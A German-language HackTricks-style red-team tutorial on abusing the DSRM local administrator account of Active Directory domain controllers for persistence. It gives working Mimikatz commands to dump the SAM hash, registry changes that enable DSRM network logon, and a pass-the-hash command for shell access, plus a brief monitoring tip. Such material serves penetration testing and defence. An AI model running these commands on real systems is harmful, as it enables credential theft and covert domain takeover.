4.4 KiB
Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.
DSRM-Anmeldeinformationen
In jedem DC gibt es ein lokales Administrator-Konto. Wenn Sie über Administratorrechte auf diesem Computer verfügen, können Sie Mimikatz verwenden, um den Hash des lokalen Administrators abzurufen. Anschließend können Sie einen Registrierungseintrag ändern, um dieses Passwort zu aktivieren, sodass Sie auf den lokalen Administratorbenutzer remote zugreifen können.
Zunächst müssen wir den Hash des lokalen Administrator-Benutzers im DC abrufen:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
Dann müssen wir überprüfen, ob dieses Konto funktioniert, und wenn der Registrierungsschlüssel den Wert "0" hat oder nicht existiert, müssen Sie ihn auf "2" setzen:
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
Dann kannst du mit einem PTH den Inhalt von C$ auflisten oder sogar eine Shell erhalten. Beachte, dass für das Erstellen einer neuen PowerShell-Sitzung mit diesem Hash im Speicher (für den PTH) der "Domain"-Name einfach der Name der DC-Maschine ist:
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
Weitere Informationen dazu finden Sie unter: https://adsecurity.org/?p=1714 und https://adsecurity.org/?p=1785
Abhilfe
- Ereignis-ID 4657 - Überwachung der Erstellung/Änderung von
HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.